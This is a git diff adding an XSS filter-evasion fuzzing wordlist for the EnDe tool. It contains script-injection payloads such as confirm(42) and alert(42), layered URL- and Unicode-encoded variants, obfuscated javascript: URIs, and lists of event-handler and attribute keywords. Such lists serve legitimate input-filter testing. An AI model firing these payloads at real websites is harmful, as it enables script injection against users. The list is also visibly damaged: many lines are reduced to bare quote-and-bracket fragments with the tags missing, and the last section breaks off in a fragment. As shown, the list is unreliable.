diff --git a/Fuzzing/XSS/XSS-EnDe-evation.txt b/Fuzzing/XSS/XSS-EnDe-evation.txt
new file mode 100644
index 00000000..92e5a3bd
--- /dev/null
+++ b/Fuzzing/XSS/XSS-EnDe-evation.txt
@@ -0,0 +1,217 @@
+# =========================================================================== #
+#?
+#? NAME
+#? xss-evation.txt
+#?
+#? SYNOPSIS
+#?
+#? DESCRIPTION
+#? List of Cross-site Scriptings (XSS) samples.
+#? Empty lines and lines starting with a # are comments and should be
+#? ignored. All other lines contain one payload per line.
+#?
+# HACKER's INFO
+# This file used in EnDe's "Load File" menu.
+#?
+#? VERSION
+#? @(#) xss-evation.txt 1.5 13/05/12 10:51:43
+#?
+#? AUTHOR
+#? 10-jun-10 Achim Hoffmann, mailto: EnDe (at) my (dash) stp (dot) net
+#?
+# =========================================================================== #
+
+#group most-in-one pattern
+"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑-->
+#group general filter evasion
+"'>
+"'>
+"'>
+"'>
+"'>
+"'>
+"'>
+"'>
+"'><\script>confirm(42)
+"'>confirm(42)
+"'>confirm(42)
+"'>
+"'>alert(42)
+"'><;(24)trela=daolno ;''=e>'=d
+"'><;(24)trela=daolno ;''=/e>'=d
+"'>
+# real tab
+"'>confirm(42)
+# URL-encoded
+"'%3e%3cscript%3econfirm(42)%3c/script%3e
+"'%253e%253cscript%253econfirm(42)%253c/script%253e
+"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
+"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
+"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
+"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
+%22%27%3e%3cscript%3econfirm(42)%3c/script%3e
+%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
+%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
+%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e
+%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
+%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e
+%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
+# Unicode characters
+"'>
+"'ܾܼscriptܾalert(42)ܼܯscriptܾ
+"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
+"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
+%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
+%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
+"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
+"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
+%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
+%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
+#group javascript keywords
+javascript:alert(42)
+javascript:prompt(42)
+javascript:confirm(42)
+jAvasCript:confirm(42)
+jAvas\Cript:confirm(42)
+jAvas Cript:confirm(42)
+jAvas/* */Cript:confirm(42)
+ javascript:alert(42)
+document
+document.
+top
+top.
+top[
+eval
+eval(
+cookie
+.cookie
+#group HTML event keywords
+onerror
+onerror=
+onclick
+onclick=
+onmouseover
+onmouseover=
+onload
+onload=
+"onerror
+"onerror=
+"onclick
+"onclick=
+"onmouseover
+"onmouseover=
+"onload
+"onload=
+#group HTML tag attribute keywords
+href=
+src=
+link=
+style=
+alt=
+title=
+egal=
+"href=
+"src=
+"link=
+"style=
+"alt=
+"title=
+"egal=
+#group HTML tag keywords
+
+![/]()
+